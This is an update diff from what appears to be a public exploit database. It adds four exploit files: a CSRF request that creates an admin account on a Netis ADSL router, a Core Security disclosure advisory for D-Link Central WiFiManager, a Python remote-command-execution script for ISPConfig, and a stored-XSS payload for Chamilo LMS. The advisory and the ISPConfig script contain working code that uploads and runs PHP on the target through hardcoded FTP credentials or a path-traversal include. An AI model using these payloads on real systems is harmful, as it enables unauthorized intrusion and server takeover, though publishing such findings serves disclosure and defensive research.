DB: 2018-10-06

4 changes to exploits/shellcodes

Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP)
Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR & DEP Bypass)

NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)
NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)
Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)
D-Link Central WiFiManager Software Controller 1.03 - Multiple Vulnerabilities
ISPConfig < 3.1.13 - Remote Command Execution
Chamilo LMS 1.11.8 - Cross-Site Scripting

Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)
Linux/x86 - execve(/bin/sh) + ROT-N/Shift-N/XOR-N Encoded Shellcode (77 bytes)

Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)
Linux/x86 - execve(/bin/sh) + ROT-13/RShift-2/XOR Encoded Shellcode (44 bytes)

Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 byes)
Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes)

exploits/hardware/webapps/45532.txt

@@ -0,0 +1,42 @@
+# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)
+# Author: Cakes
+# Discovery Date: 2018-10-01
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Home/detail/id/74.html
+# Tested Version: RTK 2.1.1
+# Tested on OS: Kali Linux
+# CVE: N/A
+ 
+# Description
+# Due to improper session management an attacker is able to add a administrator account
+# without providing any authentication credentials.
+
+# PoC 1
+POST /form2userconfig.cgi HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 112
+
+username=Cakes&privilege=2&newpass=1234&confpass=1234&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
+
+# PoC 2
+<html>
+  <body>
+    <form action="http://Target/form2userconfig.cgi" method="POST">
+      <input type="hidden" name="username" value="Cakes" />
+      <input type="hidden" name="privilege" value="2" />
+      <input type="hidden" name="newpass" value="1234" />
+      <input type="hidden" name="confpass" value="1234" />
+      <input type="hidden" name="adduser" value="Add" />
+      <input type="hidden" name="hiddenpass" value="" />
+      <input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/45533.txt

@@ -0,0 +1,315 @@
+Core Security - Corelabs Advisory
+http://corelabs.coresecurity.com/
+
+D-Link Central WiFiManager Software Controller Multiple Vulnerabilities
+
+1. *Advisory Information*
+
+Title: D-Link Central WiFiManager Software Controller Multiple
+Vulnerabilities
+Advisory ID: CORE-2018-0010
+Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities
+Date published: 2018-10-04
+Date of last update: 2018-10-04
+Vendors contacted: D-Link
+Release mode: Coordinated release
+
+2. *Vulnerability Information*
+
+Class: Unrestricted Upload of File with Dangerous Type [CWE-434],
+Improper Authorization [CWE-285], Improper Neutralization of Input
+During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper
+Neutralization of Input During Web Page Generation
+('Cross-site Scripting') [CWE-79]
+Impact: Code execution
+Remotely Exploitable: Yes
+Locally Exploitable: Yes
+CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441
+
+3. *Vulnerability Description*
+
+D-Link's website states that:
+
+[1] Central WiFiManager Software Controller helps network administrators
+streamline their wireless access point (AP) management workflow. Central
+WiFiManager is an innovative approach to the more traditional
+hardware-based multiple access point management system. It uses a
+centralized server to both remotely manage and monitor wireless APs on a
+network.
+
+Vulnerabilities were found in the Central WiFiManager Software
+Controller, allowing unauthenticated and authenticated file upload with
+dangerous type that could lead to remote code execution with system
+permissions. Also, two stored Cross Site Scripting vulnerabilities were
+found.
+
+4. *Vulnerable Packages*
+
+    . Central WifiManager v1.03
+
+Other products and versions might be affected, but they were not tested.
+
+5. *Vendor Information, Solutions and Workarounds*
+
+D-Link released the following Beta version that addresses the reported vulnerabilities:
+
+    . Central WifiManager v 1.03r0100-Beta1
+
+In addition, D-Link published a security note in:
+https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092
+
+6. *Credits*
+
+These vulnerabilities were discovered and researched by Julian Muñoz
+from Core Security Consulting Services. The publication of this advisory
+was coordinated by Leandro Cuozzo from Core Advisories Team.
+
+7. *Technical Description / Proof of Concept Code*
+
+D-Link Central WiFiManager Software Controller exposes an FTP server
+that serves by default in port 9000 and has hardcoded credentials
+(admin, admin). Taking advantage of this fact, we will upload a PHP file
+in the '/web/public' directory and then, by requesting this file, will
+be able to execute arbitrary code on the target system (shown in 7.1).
+
+On 7.2 we show a similar attack to but in this case with an
+authenticated user in the web application. The application has a
+functionality to upload a .rar file used for the captive portal
+displayed by the Access Points. We will craft a .rar with a PHP file
+that we will end up executing in the context of the web application.
+When the .rar is uploaded is stored in the path "\web\captivalportal" in
+a folder with a timestamp created by the PHP time() function. In order
+to know what is the web server's time we request an information file
+that contains the time we are looking for. After we have the server's
+time we upload the .rar, calculate the proper epoch and request the
+appropriate path increasing this epoch by one until we hit the correct
+one.
+
+Finally, we discovered two Cross-Site Scripting, one on the update site
+functionality, in the 'sitename' parameter (7.3) and the other one on
+the creation of a local user in the 'username' parameter (7.4).
+
+7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of
+File with Dangerous Type*
+
+[CVE-2018-17440] The web application starts an FTP server running on the
+port 9000 by default with admin/admin credentials and do not show the
+option to change it, so in this POC we establish a connection with the
+server and upload a PHP file. Since the application do not restrict
+unauthenticated users to request any file in the web root, we later
+request the uploaded file to achieve remote code execution.
+
+/-----
+import requests
+from ftplib import FTP
+
+#stablish connection with FTP server
+host_ip = "127.0.0.1"
+ftp = FTP()
+ftp.connect(host=host_ip<ftp://ftp.connect(host=host_ip>, port=9000)
+ftp.login(<ftp://ftp.login(>"admin", "admin")
+data = []
+
+#create PHP poc file
+poc_php_file = open("poc.php", "w+")
+poc_php_file.write("<?php\nsystem('whoami');\n?>")
+poc_php_file.close()
+
+#upload PHP poc file
+php_file = open("poc.php", "rb")
+ftp.cwd('/web/public')<ftp://ftp.cwd('/web/public')>
+ftp.storbinary(<ftp://ftp.storbinary(>"STOR write_file.php", php_file)
+ftp.dir(data.append)<ftp://ftp.dir(data.append)>
+ftp.quit()<ftp://ftp.quit()>
+
+for line in data:
+  print "-", line
+
+session = requests.Session()
+session.trust_env = False
+
+#get the uploaded file for remote code execution
+get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False)
+
+print get_uploaded_file.text
+-----/
+
+7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type*
+
+[CVE-2018-17442] In this case we make a file upload using the
+functionality given by the onUploadLogPic endpoint, that will take a
+.rar file, decompress it and store it in a folder named after the PHP
+time() function. Our goal is first obtain the server's time, upload a
+.rar with our PHP file, calculate the proper epoch and iterate
+increasing it until we hit the proper one and remote code execution is
+achieved.
+
+/-----
+import re
+import time
+import requests
+import datetime
+import tarfile
+
+def parse_to_datetime(date_string):
+    date_list = date_string.split("-")
+    td = date_list[2][2:].split(":")
+    return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2]))
+
+session = requests.Session()
+session.trust_env = False
+php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id)
+cookie = {'PHPSESSID': php_session_id}
+
+#create tar file to upload.
+poc_php_file = open("poc.php", "w+")
+poc_php_file.write("<?php\nsystem('whoami');\n?>")
+poc_php_file.close()
+
+poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w")
+poc_tar_file.add("poc.php")
+poc_tar_file.close()
+
+#get server datetime.
+get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT',
+                                                  cookies=cookie, verify=False)
+date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '')
+#generate epoch from server's date
+epoch = int(time.mktime(parse_to_datetime(date).timetuple()))
+
+#upload attack PHP file.
+attack_tar_file = "poc_tar_file.tar"
+tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')}
+restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic',
+                                       files=tar_file,
+                                       cookies=cookie, verify=False)
+
+for i in range(0,20):
+    #get the uploaded file named after time epoch, returned by PHP time() function.
+    filename = str(epoch) + "/" + "poc.php"
+    get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False)
+    if get_uploaded_file.status_code == 200:
+        print "Remote Code Execution Achived"
+        print get_uploaded_file.text
+        break
+    epoch += 1
+-----/
+
+7.3. *Cross-Site Scripting in the application site name parameter*
+
+[CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is
+vulnerable to a stored Cross Site Scripting:
+
+The following is a proof of concept to demonstrate the vulnerability:
+
+/-----
+POST /index.php/Config/UpdateSite HTTP/1.1
+Host: 10.2.45.220
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.2.45.220/index.php/Config/CreatSite
+Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
+PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 66
+
+siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1
+-----/
+
+7.4. *Cross-Site Scripting in the creation of a new user*
+
+[CVE-2018-17441] The 'username' parameter of the addUser endpoint is
+vulnerable to a stored Cross Site Scripting.
+
+The following is a proof of concept to demonstrate the vulnerability:
+
+/-----
+POST /index.php/System/addUser HTTP/1.1
+Host: 10.2.45.220
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.2.45.220/index.php/System/userManager
+Content-Type: application/x-www-form-urlencoded;
+Content-Length: 96
+Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
+PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
+Connection: close
+
+username=<script>alert(1)</script>&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change&
+-----/
+
+8. *Report Timeline*
+
+2018-06-04: Core Security sent an initial notification to D-Link,
+including a draft advisory.
+2018-06-06:D-Link confirmed the reception of the advisory and informed
+they will have an initial response on 06/08.
+2018-06-08: D-Link informed that they would provide a schedule for the
+fixes on 06/13.
+2018-06-08: Core Security thanked the update.
+2018-06-14: D-Link informed its plan of remediation and notified Core
+Security that the fixed version will be available on 08/31.
+2018-06-15: Core Security thanked the update and proposed to keep in
+regular contact until this tentative release date.
+2018-07-23: Core Security requested a status update.
+2018-07-25: D-Link answered saying that they are still targeting 08/31
+as the release date.
+2018-08-24: Core Security requested a new status update and a solidified
+release date for the fixed version.
+2018-08-28: D-Link sent a beta version for test.
+2018-08-30: Core Security tested the beta version and requested D-Link
+to coordinate a release date.
+2018-09-21: D-Link informed that they were planning a security
+announcement and they were ready to schedule a disclosure date.
+2018-09-24: Core Security thanked the update and proposed October 4th as
+the publication date.
+2018-10-04: Advisory CORE-2018-0010 published.
+
+9. *References*
+
+[1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/.
+
+10. *About CoreLabs*
+
+CoreLabs, the research center of Core Security, is charged with
+anticipating the future needs and requirements for information security
+technologies. We conduct our research in several important areas of
+computer security including system vulnerabilities, cyber attack
+planning and simulation, source code auditing, and cryptography. Our
+results include problem formalization, identification of
+vulnerabilities, novel solutions and prototypes for new technologies.
+CoreLabs regularly publishes security advisories, technical papers,
+project information and shared software tools for public use at:
+http://corelabs.coresecurity.com.
+
+11. *About Core Security*
+
+Core Security provides companies with the security insight they need to
+know who, how, and what is vulnerable in their organization. The
+company's threat-aware, identity & access, network security, and
+vulnerability management solutions provide actionable insight and
+context needed to manage security risks across the enterprise. This
+shared insight gives customers a comprehensive view of their security
+posture to make better security remediation decisions. Better insight
+allows organizations to prioritize their efforts to protect critical
+assets, take action sooner to mitigate access risk, and react faster if
+a breach does occur.
+
+Core Security is headquartered in the USA with offices and operations in
+South America, Europe, Middle East and Asia. To learn more, contact Core
+Security at (678) 304-4500 or info@coresecurity.com<mailto:info@coresecurity.com>
+
+12. *Disclaimer*
+
+The contents of this advisory are copyright (c) 2018 Core Security and
+(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
+Non-Commercial Share-Alike 3.0 (United States) License:
+http://creativecommons.org/licenses/by-nc-sa/3.0/us/

exploits/php/webapps/45534.py

@@ -0,0 +1,143 @@
+# Title: ISPConfig < 3.1.13 - Remote Command Execution
+# Author: 0x09AL 
+# Date: 20/08/2018
+# Vendor: https://www.ispconfig.org/
+# 
+# Vulnerability Description
+#
+# There is an include on almost all the php files, which includes the language template.
+# For example:
+
+# In password_reset.php - Line 46 the following code tries to include the filename 
+# that is specified in the $_SESSION['s']['language'] variable.
+#
+# include ISPC_ROOT_PATH.'/web/login/lib/lang/'.$_SESSION['s']['language'].'.lng';
+# 
+# Searching a little bit where the $_SESSION['s']['language'] variable is set we can find a reference in user_settings.php
+# if(preg_match('/[a-z]{2}/',$_POST['language'])) {
+#            $_SESSION['s']['user']['language'] = $_POST['language'];
+#            $_SESSION['s']['language'] = $_POST['language'];
+#        } else {
+#            $app->error('Invalid language.');
+#        }
+# 
+# The regex checks if the language contains two lower-case characters.
+# The problem is that everything that contains two [a-z] characters will match the regex.
+# Developer probably missed the ^ $ on the regex to match the entire file.
+#
+# Since in the new versions of php we can not use null byte injections, either a path-truncation attack
+# we can create a ftp-account, upload the file we want to include with .lng extension at our path and the code 
+# will get executed as the ispconfig account and not as our chroot-ed account.
+#
+# This exploit can be triggered by having clients credentias , and exploiting this vulnerability we can compromise
+# the entire clients.
+#
+# You need to specify the hostname:port , username, and password of the client.
+
+import requests
+import ftplib
+import json
+import time
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+host = "host:8080"
+username = "username"
+password = "password"
+
+exp = requests.session()
+user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
+ftp_username = "randomusr1"
+domain = "pwned.com"
+site_id = 1
+payload_name = "pwned1"
+path = ""
+
+
+
+def login():
+  r = exp.post('https://%s/login/index.php' % host,data={'username':username,'password':password,'s_mod':'login','s_pg':'index'},verify=False)
+  if(r.text.find("wrong")>0):
+    print "[-] Incorrect credentials [-]"
+  else:
+    print "[+] Logged in Succesfully [+]"
+
+
+def createSite():
+  
+  r = exp.get('https://%s/sites/web_vhost_domain_edit.php' % host,verify=False)
+  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
+  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
+  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
+  r = exp.post('https://%s/sites/web_vhost_domain_edit.php' % host,data={'server_id':1,'ip_address':'*','ipv6_address':'','domain':'%s' % domain,'hd_quota':1024,'traffic_quota':1024,'subdomain':'www','php':'no','fastcgi_php_version':'','active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
+  pass
+
+def createFtp():
+  global site_id
+  r = exp.get('https://%s/sites/ftp_user_edit.php' % host,verify=False)
+  print "[+] Getting IDSof the sites [+]"
+  temp_array = r.text.split('<option value=')
+  nr_sites = len(temp_array)
+  print "[+] Number of sites %d [+]" % (int(nr_sites) - 1)
+  # Find the latest created site by checking the ID.
+  max_id = -9999
+
+  for i in range(1,nr_sites):
+    temp = int(temp_array[i].split('>')[0].replace("'",""))
+    if(temp > max_id):
+      max_id = temp
+  site_id = max_id
+  print "[+] Newly created site id is : %d [+]" % site_id
+  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
+  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
+  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
+  r = exp.post('https://%s/sites/ftp_user_edit.php' % host,data={'parent_domain_id':site_id,'username':'%s' % ftp_username,'password':'%s' % password,'repeat_password':'%s' % password,'quota_size':1024,'active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
+  print "[+] Created FTP Account [+]"
+  pass
+
+
+def uploadPayload():
+  ftp = ftplib.FTP(host.split(":")[0])
+  ftp.login(username+ftp_username, password)
+  ftp.cwd("web")
+  ftp.storlines("STOR %s.lng" % payload_name,open("test.txt"))
+  print "[+] Payload %s uploaded Succesfully [+]" % payload_name
+  pass
+
+def waitTillCreation():
+  while 1:
+    print "[+] Trying [+]"
+    r = exp.get('https://%s/datalogstatus.php' % host,verify=False)
+    temp = json.loads(r.text)
+    if(temp["count"] == 0):
+      print "[+] Everything created .... [+]"
+      return
+    time.sleep(5)
+
+def getRelativePath():
+  
+  global path
+
+  r = exp.get('https://%s/sites/web_vhost_domain_edit.php?id=%d&type=domain' % (host,site_id),verify=False)
+  path = r.text.split('Document Root</label>')[1].split('<div class="col-sm-9">')[1].split('<')[0]
+  path += "/web/" + payload_name
+  print "[+] Uploading payload in %s [+]" % path
+
+def triggerVuln():
+  r = exp.get('https://%s/tools/user_settings.php' % host,verify=False)
+  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
+  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
+  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
+  user_id = r.text.split('name="id" value="')[1].split('"')[0]
+  r = exp.post('https://%s/tools/user_settings.php' % host,data={'passwort':'','repeat_password':'','language':'../../../../../../../../../../../../../..%s' % path,'id':'%s' % user_id,'_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
+  r = exp.get('https://%s/index.php'% host,verify=False)
+  print r.text
+
+login()
+createSite()
+createFtp()
+getRelativePath()
+waitTillCreation()
+uploadPayload()
+triggerVuln()

exploits/php/webapps/45535.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Chamilo LMS 1.11.8 - Cross-Site Scripting
+# Author: Cakes
+# Discovery Date: 2018-10-05
+# Vendor Homepage: https://chamilo.org
+# Software Link: https://github.com/chamilo/chamilo-lms/releases/download/v1.11.8/chamilo-1.11.8-php5.zip
+# Tested Version: 1.11.8 for php5
+# Tested on OS: Kali Linux
+# CVE: N/A
+ 
+# Description:
+# Improper input validation on the  Calendar / Personal Agenda page allows attackers add a persistent 
+# Cross-Site scripting attack to the meeting's content field when adding a new meeting.
+# Simply intercept a new meeting request and add in the XSS
+ 
+# PoC
+
+GET /chamillo/main/inc/ajax/agenda.ajax.php?type=personal&a=add_event&start=2018-10-05%2000:00:00&end=2018-10-06%2000:00:00&all_day=true&view=month&title=Important+Info&content=%3Cp%3E<script>alert("Cakes");</script>%3C%2Fp%3E%0D%0A&_qf__form= HTTP/1.1
+Host: 10.0.0.16
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+X-Requested-With: XMLHttpRequest
+Referer: http://10.0.0.16/chamillo/main/calendar/agenda_js.php?type=personal
+Cookie: defaultMyCourseView3=0; ch_sid=04uo1hmqp7e49f8l36e6s9oit1; agenda_cookies={%22view%22:%22month%22%2C%22start%22:%222018-10-01%22}
+Connection: close

files_exploits.csv

@@ -9957,7 +9957,7 @@ id,file,description,date,author,type,platform,port
 45147,exploits/linux/local/45147.rb,"Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)",2018-08-03,Metasploit,local,linux,
 45149,exploits/windows_x86-64/local/45149.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation",2018-08-05,"sickness & mschenk",local,windows_x86-64,
 45151,exploits/windows/local/45151.py,"AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)",2018-08-06,bzyo,local,windows,
-45163,exploits/windows/local/45163.txt,"Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP)",2018-08-07,"Manoj Ahuje",local,windows,
+45163,exploits/windows/local/45163.txt,"Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR & DEP Bypass)",2018-08-07,"Manoj Ahuje",local,windows,
 45165,exploits/windows_x86-64/local/45165.py,"iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow",2018-08-08,"Rodrigo Eduardo Rodriguez",local,windows_x86-64,
 45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64,
 45171,exploits/windows/local/45171.vb,"Soroush IM Desktop App 0.17.0 - Authentication Bypass",2018-08-09,VortexNeoX64,local,windows,
@@ -10011,7 +10011,7 @@ id,file,description,date,author,type,platform,port
 45505,exploits/windows_x86/local/45505.py,"Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)",2018-10-01,SPARC,local,windows_x86,
 45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux,
 45528,exploits/linux/local/45528.txt,"virtualenv 16.0.0 - Sandbox Escape",2018-10-04,vr_system,local,linux,
-45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)",2018-10-04,"Miguel Mendez Z",local,windows_x86,
+45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)",2018-10-04,"Miguel Mendez Z",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40068,3 +40068,7 @@ id,file,description,date,author,type,platform,port
 45525,exploits/hardware/webapps/45525.txt,"Airties AIR5342 1.0.0.18 - Cross-Site Scripting",2018-10-03,"Ismail Tasdelen",webapps,hardware,80
 45526,exploits/hardware/webapps/45526.txt,"RICOH MP C1803 JPN Printer - Cross-Site Scripting",2018-10-03,"Ismail Tasdelen",webapps,hardware,
 45530,exploits/php/webapps/45530.txt,"LayerBB Forum 1.1.1 - 'search_query' SQL Injection",2018-10-04,"Ihsan Sencan",webapps,php,
+45532,exploits/hardware/webapps/45532.txt,"Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)",2018-10-05,cakes,webapps,hardware,80
+45533,exploits/php/webapps/45533.txt,"D-Link Central WiFiManager Software Controller 1.03 - Multiple Vulnerabilities",2018-10-05,"Core Security",webapps,php,
+45534,exploits/php/webapps/45534.py,"ISPConfig < 3.1.13 - Remote Command Execution",2018-10-05,0x09AL,webapps,php,
+45535,exploits/php/webapps/45535.txt,"Chamilo LMS 1.11.8 - Cross-Site Scripting",2018-10-05,cakes,webapps,php,

files_shellcodes.csv

@@ -756,7 +756,7 @@ id,file,description,date,author,type,platform
 43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86
 43778,shellcodes/arm/43778.asm,"Linux/ARM - Reverse (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)",2018-01-15,rtmcx,shellcode,arm
 43897,shellcodes/linux_x86/43897.nasm,"Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)",2018-01-26,0xAlaufi,shellcode,linux_x86
-43890,shellcodes/linux_x86/43890.c,"Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)",2018-01-23,"Hashim Jawad",shellcode,linux_x86
+43890,shellcodes/linux_x86/43890.c,"Linux/x86 - execve(/bin/sh) + ROT-N/Shift-N/XOR-N Encoded Shellcode (77 bytes)",2018-01-23,"Hashim Jawad",shellcode,linux_x86
 40549,shellcodes/windows_x86-64/40549.c,"Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
 40781,shellcodes/windows_x86-64/40781.c,"Windows/x64 - Reverse (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
@@ -879,7 +879,7 @@ id,file,description,date,author,type,platform
 44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
 44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86
 44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
-44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
+44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13/RShift-2/XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
 44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
 44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
 44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86
@@ -908,7 +908,7 @@ id,file,description,date,author,type,platform
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
-45529,shellcodes/linux_x86/45529.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 byes)",2018-10-04,"Pedro Cabral",shellcode,linux_x86
+45529,shellcodes/linux_x86/45529.c,"Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes)",2018-10-04,"Pedro Cabral",shellcode,linux_x86
 45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
 45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
 45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86